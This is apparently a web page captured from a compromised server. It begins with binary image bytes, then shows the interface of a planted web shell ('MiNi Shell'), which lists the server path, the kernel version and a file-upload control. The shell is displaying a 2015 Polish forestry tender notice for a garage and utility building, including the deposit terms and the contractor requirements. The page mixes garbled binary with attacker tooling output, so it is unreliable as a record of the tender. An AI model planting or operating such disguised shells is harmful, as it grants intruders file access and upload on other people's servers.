JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151009/267666-N-2015.html

<p class="kh_header"><b>Lipka: Budowa budynku gospodarczo-garażowego w leśnictwie Lipka</b><br>
<b>Numer ogłoszenia: 267666 - 2015; data zamieszczenia: 09.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGL LP - Nadleśnictwo Lipka , Mały Buczek 38, 77-420 Lipka, woj. wielkopolskie, tel. 067 2665046, faks 067 2665753.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku gospodarczo-garażowego w leśnictwie Lipka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa budynku garażowo-gospodarczego wraz z geodezyjną inwentaryzacją powykonawczą oraz przekazaniem współrzędnych punktów w formacie ESRI z HPFile w układzie współrzędnych PUWG 1.

Budynek garażowo-gospodarczy niepodpiwniczony, z poddaszem nieużytkowym - strychem,  niepodpiwniczony, dach dwuspadowy, o konstrukcji drewnianej, pokryty dachówką. Budynek z dwoma niezależnymi wejściami do pomieszczeń gospodarczych. W części frontowej 2 bramy wjazdowe do pomieszczenia garażowego. Po prawej stronie budynku podcień na drewno opałowe.
Nadleśnictwo Lipka, leśnictwo Lipka, Potulice 24, działka nr. 8220, gmina Lipka, powiat złotowski, woj. wielkopolskie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, w przypadku udzielenia,         w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych, stanowiących nie więcej niż 50% wartości zamówienia podstawowego                        i polegających na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego - na  podstawie art. 67 ust. 1 pkt 6 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.13.00-2, 45.21.13.50-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości : 3.500,00 zł                              ( słownie:   trzy tysiące pięćset , 00/100 złotych ). 
Wadium może być wniesione w następujących formach, w zależności od wyboru wykonawcy:
-pieniądzu wpłaconym przelewem na rachunek bankowy Zamawiającego: Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego:                    PKO BP O/ZLOTÓW, nr rachunku: 63 1020 3844 0000 1802 0006 8353 z dopiskiem: wadium na zabezpieczenie oferty przetargowej zadania:  Budowa budynku gospodarczo-garażowego w leśnictwie Lipka                                                                                                Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem zaleca się dołączyć do oferty.
- w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia pieniężnego SKOK lub poręczeniach udzielanych przez podmioty, których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42  poz., 275 , z późn. zm.), które w postaci nienaruszonego oryginału należy zdeponować za pokwitowaniem w kasie w Nadleśnictwie Lipka, Mały Buczek 38, 77-420 Lipka. Do oferty zaleca się załączyć kserokopię dokumentu potwierdzającego wniesienie wadium. Z treści gwarancji powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy.
Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. tj. do dnia 26.10.2015 r. godz.: 0900.
Z treści gwarancji musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny podpis (z podaniem Imienia i Nazwiska).
W przypadku przedłużenia przez Wykonawcę terminu związania ofertą, Gwarant zobowiązuje się przedłużyć okres ważności wadium na czas wskazany przez  Wykonawcę, a jeżeli nie jest to możliwe wystawić nowe wadium na przedłużony okres związania ofertą (art.85, pkt.2 i 4 ustawy Pzp)
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w terminie do 26.10.2015 r. do godz. 0900 znajdzie się na rachunku bankowym Zamawiającego.
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
Z wadium wnoszonego w innej formie niż pieniądz powinno wynikać jednoznacznie gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.
Wadium w innej formie niż pieniądz należy złożyć łącznie z ofertą (ale w oddzielnej kopercie, by nie było na stale związane z ofertą).
Wadium w formie innej niż pieniądz należy złożyć w kasie wewnętrznej Nadleśnictwa Lipka, od poniedziałku do piątku od godz. 7.00- do 15.00 
Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia ubiegać się mogą Wykonawcy nie wykluczeni na podstawie art.
24 ustawy oraz spełniający warunki zawarte w art. 22 ust. 1 ustawy, a więc dotyczące: 1)
posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy
prawa nakładają obowiązek ich posiadania; 2) posiadania wiedzy i doświadczenia; 3)
dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania
zamówienia; 4) sytuacji ekonomicznej i finansowej. 2. Celem spełnienia warunków zawartych
w art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi
wykazać, iż będzie dysponował : a) W zakresie posiadania wiedzy i doświadczenia - wykonał
co najmniej jedną robotę budowlana w zakresie odpowiadającym przedmiotowi zamówienia to
jest budowę obiektu kubaturowego o wartości co najmniej 100 000,00 zł za tę robotę.
Wykonawca nie może łączyć robót o mniejszej wartości celem uzyskania wymaganej przez
zamawiającego wartości. b) W zakresie dysponowania osobami zdolnymi do wykonania
zamówienia - dysponuje dwiema osobami, które będą uczestniczyły w wykonaniu zamówienia,
tj. jedna, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w
specjalności konstrukcyjno-budowlanej i wykonywała co najmniej jedno zadanie w zakresie
odpowiadającym przedmiotowi zamówienia jako kierownik budowy oraz druga która posiada
uprawnienia w zakresie instalacji elektrycznych. c) W zakresie sytuacji ekonomicznej - posiada
środki finansowe lub zdolność kredytową na kwotę minimum 100 000,00 zł. d) posiadanie
ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzenia działalności zgodną z
wymogami przedmiotu zamówienia na kwotę nie mniejszą niż 100 000,00 zł. 3. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia w oparciu
o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdz. 7
SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki
Wykonawca spełnił. 7. Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy
w celu potwierdzenia spełnienia warunków udziału w postepowaniu 7.1 W celu wykazania
braku podstaw do wykluczenia z postępowania o udzielenie zamówienia do oferty należy
załączyć: a) oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie
zamówienia - zgodnie z załącznikiem nr 3 do SIWZ. (W przypadku wspólnego ubiegania się o
udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być
złożone przedmiotowe dokumenty dla każdego z nich). b) aktualny odpis z właściwego
rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne
przepisy wymagają wpisu do rejestru lub ewidencji, w celu wskazania braku podstaw do
wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6
miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w
postepowaniu o udzielenie zamówienia albo składania ofert (W przypadku wspólnego
ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w
ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich). c) aktualne
zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu
Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające
odpowiednio, ze wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na
ubezpieczenie zdrowotne i społeczne. Lub zaświadczenia, że uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed
upływem terminu składania ofert 7.2 W celu wykazania spełnienia warunków udziału w
postępowaniu do ofert należy załączyć następujące oświadczenia i dokumenty: a) Wykonawca
zobowiązany jest do złożenia oświadczenie o spełnianiu warunków udziału w postępowaniu
określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (jeżeli oferta jest składana
wspólnie przez kilka podmiotów, oświadczenie takie powinno być złożone, jako jedno
podpisane przez wszystkich partnerów lub ich pełnomocnika) - zgodnie z załącznikiem nr 2 do
SIWZ. b) wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku
wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu
składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres
prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaj i wartości, daty i
miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały
wykonane zgodnie z zasadami sztuki budowlane i prawidłowo ukończone - zgodnie z
załącznikiem nr 4 do SIWZ. Z wykazu ma wynikać, że Wykonawca wykonał co najmniej jedną robotę budowlaną w zakresie odpowiadającym przedmiotowi zamówienia o wartości co
najmniej 100.000,0 zł za tę robotę. Wykonawca nie może łączyć robót o mniejszej wartości
celem uzyskania wymaganej przez zamawiającego wartości. (W przypadku składania oferty
wspólnej Wykonawcy składają jeden wspólny w/w wykaz). c) Wykaz osób, które będą
uczestniczyć w wykonaniu zamówienia niezależnie od tego czy są one zatrudnione
bezpośrednio przez Wykonawcę wraz z informacjami na temat ich kwalifikacji zawodowych,
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu
wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi
osobami - zgodnie z załącznikiem nr 5 do SIWZ. W wykazie tym należy wykazać, iż dysponuje
dwiema osobami, które będą uczestniczyły w wykonaniu zamówienia, tj. jedna, która posiada
uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjnobudowlanej
i wykonywała co najmniej jedno zadanie w zakresie odpowiadającym
przedmiotowi zamówienia jako kierownik budowy oraz druga która posiada uprawnienia w
zakresie instalacji elektrycznych. (W przypadku składania oferty wspólnej, Wykonawcy
składają jeden wspólny w/w wykaz). d) Oświadczenie, że osoby, które będą uczestniczyć w
wykonywaniu zamówienia (wymienione w wykazie osób) posiadają wymagane uprawnienia tj.
uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjnobudowlanej,
zgodnie z załącznikiem nr 5 A do SIWZ. e) informację banku lub spółdzielczej
kasy oszczędnościowo-kredytowej, potwierdzającej wysokości posiadania środków
finansowych lub zdolność kredytową Wykonawcy wystawionej nie wcześniej niż 3 miesiące
przed upływem terminu składania ofert. Z dokumentu ma wynikać, że Wykonawca dysponuje
minimum kwotą 100 000 zł 7.3. Wykonawca może polegać na wiedzy i doświadczeniu,
potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach
finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego
łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić
Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w
szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania
mu do dyspozycji niezbędnych zasobów na potrzeby wykonywaniu zamówienia -zgodnie z
załącznikiem nr 6 do SIWZ. Zamawiający wymaga by wykonawca wykazał w jaki sposób
czynny (faktyczny) będą przekazywane te zasoby w szczególności przy poleganiu na wiedzy i
doświadczeniu innych podmiotów. 4 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania
poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa o których
mowa w pkt 7.1 b składa dokument lub dokumenty wystawione w kraju , w którym ma siedzibę
lub miejsce zamieszkania, odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono
upadłości. Dokument ma być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu
składania oferty. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa o których mowa w pkt 7.1 lit c
składa dokument lub dokumenty wystawione w kraju , w którym ma siedzibę lub miejsce
zamieszkania, odpowiednio informacji o niezaleganiu z opłaceniem podatków, opłat oraz
składek na ubezpieczenie zdrowotne i społeczne albo, że uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania
decyzji właściwego organu. Dokument ma być wystawiony nie wcześniej niż 3 miesięcy przed
upływem terminu składania oferty. 7.5 Jeżeli w miejscu zamieszkania osoby lub kraju, w
którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o
których mowa w pkt 7.4, zastępuje się je dokumentem zawierającym oświadczenie złożone
przed notariuszem, właściwym organem sądowym, administracyjnym albo organem
samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub
kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis dotyczący terminu
wystawienia dokumentów stosuje się odpowiednio. 7.6 W przypadku wątpliwości, co do treści
dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza
terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów
odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub
miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących
przedłożonego dokumentu. 7.7. Oferty wspólne przedstawione przez wykonawców wspólnie
ubiegających się o udzielenie zamówienia, będą musiały spełniać następujące wymagania: a)
oferta ma zawierać informację wymienione w rozdz. 7. pkt 7.1. odpowiednio dla każdego
partnera konsorcjum, b) oferta musi być podpisana w taki sposób, by wiązała prawnie
wszystkich partnerów. Osoba podpisująca ofertę musi posiadać umocowanie prawne do
reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa - treść pełnomocnictwa
powinna dokładnie określać zakres umocowania. c) wszyscy partnerzy będą ponosić
odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postawieniami, d) jeden z
partnerów konsorcjum zostanie wyznaczony jako partner kierujący (lider), upoważniony do
zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też
dla wszystkich partnerów, e) zamawiający może w ramach odpowiedzialności solidarnej żądać
wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie
lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum. f)
wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na wykonawcę; w
miejscu np. nazwa i adres wykonawcy należy wpisać dane dotyczące konsorcjum, a nie
pełnomocnika konsorcjum. g) listę podmiotów należących do tej samej grupy kapitałowej, o
której mowa w art. 24 ust. 2 pkt. 5, albo informację o tym, że wykonawca nie należy do grupy kapitałowej ( załącznik nr 8 do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż będzie dysponował: a) W zakresie posiadania wiedzy i
doświadczenia - wykonał co najmniej jedną robotę budowlana w zakresie odpowiadającym
przedmiotowi zamówienia to jest budowę obiektu kubaturowego o wartości co najmniej 100
000,00 zł za tę robotę. Wykonawca nie może łączyć robót o mniejszej wartości celem
uzyskania wymaganej przez zamawiającego wartości. W celu wykazania braku podstaw do
wykluczenia z postępowania o udzielenie zamówienia do oferty należy załączyć następujące
oświadczenia i dokumenty: b) wykaz robót budowlanych w zakresie niezbędnym do wykazania
spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed
upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a
jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaj i
wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty
zostały wykonane zgodnie z zasadami sztuki budowlane i prawidłowo ukończone - zgodnie z
załącznikiem nr 4 do SIWZ. Z wykazu ma wynikać, że Wykonawca wykonał co najmniej jedną
robotę budowlaną w zakresie odpowiadającym przedmiotowi zamówienia o wartości co
najmniej 100.000,0 zł za tę robotę. Wykonawca nie może łączyć robót o mniejszej wartości
celem uzyskania wymaganej przez zamawiającego wartości. (W przypadku składania oferty
wspólnej Wykonawcy składają jeden wspólny w/w wykaz). Wykonawca może polegać na
wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go
z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu,
iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na potrzeby wykonywaniu zamówienia -zgodnie z
załącznikiem nr 6 do SIWZ. Zamawiający wymaga by wykonawca wykazał w jaki sposób
czynny (faktyczny) będą przekazywane te zasoby w szczególności przy poleganiu na wiedzy i
doświadczeniu innych podmiotów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż będzie dysponował: W zakresie dysponowania osobami
zdolnymi do wykonania zamówienia - dysponuje dwiema osobami, które będą uczestniczyły w
wykonaniu zamówienia, tj. jedna, która posiada uprawnienia budowlane do kierowania
robotami budowlanymi w specjalności konstrukcyjno-budowlanej i wykonywała co najmniej
jedno zadanie w zakresie odpowiadającym przedmiotowi zamówienia jako kierownik budowy
oraz druga która posiada uprawnienia w zakresie instalacji elektrycznych. W celu wykazania
braku podstaw do wykluczenia z postępowania o udzielenie zamówienia do oferty należy
załączyć następujące oświadczenia i dokumenty: Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia niezależnie od tego czy są one zatrudnione bezpośrednio przez
Wykonawcę wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i
wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez
nich czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z
załącznikiem nr 5 do SIWZ. W wykazie tym należy wykazać, iż dysponuje dwiema osobami,
które będą uczestniczyły w wykonaniu zamówienia, tj. jedna, która posiada uprawnienia
budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej i
wykonywała co najmniej jedno zadanie w zakresie odpowiadającym przedmiotowi zamówienia
jako kierownik budowy oraz druga która posiada uprawnienia w zakresie instalacji
elektrycznych. (W przypadku składania oferty wspólnej, Wykonawcy składają jeden wspólny
w/w wykaz). Wykonawca może polegać na potencjale technicznym innych podmiotów,
niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej
sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w
trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na
potrzeby wykonywaniu zamówienia -zgodnie z załącznikiem nr 6 do SIWZ. Zamawiający
wymaga by wykonawca wykazał w jaki sposób czynny (faktyczny) będą przekazywane te
zasoby w szczególności przy poleganiu na wiedzy i doświadczeniu innych podmiotów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż będzie dysponował: W zakresie sytuacji ekonomicznej - posiada
środki finansowe lub zdolność kredytową na kwotę minimum 100 000,00 zł. W celu wykazania
braku podstaw do wykluczenia z postępowania o udzielenie zamówienia do oferty należy
załączyć następujące oświadczenia i dokumenty: e) informację banku lub spółdzielczej kasy
oszczędnościowo-kredytowej, potwierdzającej wysokości posiadania środków finansowych lub
zdolność kredytową Wykonawcy wystawionej nie wcześniej niż 3 miesiące przed upływem
terminu składania ofert. Z dokumentu ma wynikać, że Wykonawca dysponuje minimum kwotą
100 000 zł. Wykonawca może polegać na zdolnościach finansowych lub ekonomicznych
innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie
dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w
tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na potrzeby wykonywaniu zamówienia -zgodnie z załącznikiem nr 6 do SIWZ.
Zamawiający wymaga by wykonawca wykazał w jaki sposób czynny (faktyczny) będą
przekazywane te zasoby w szczególności przy poleganiu na wiedzy i doświadczeniu innych podmiotów.</p>
</li></ul></li></ul>
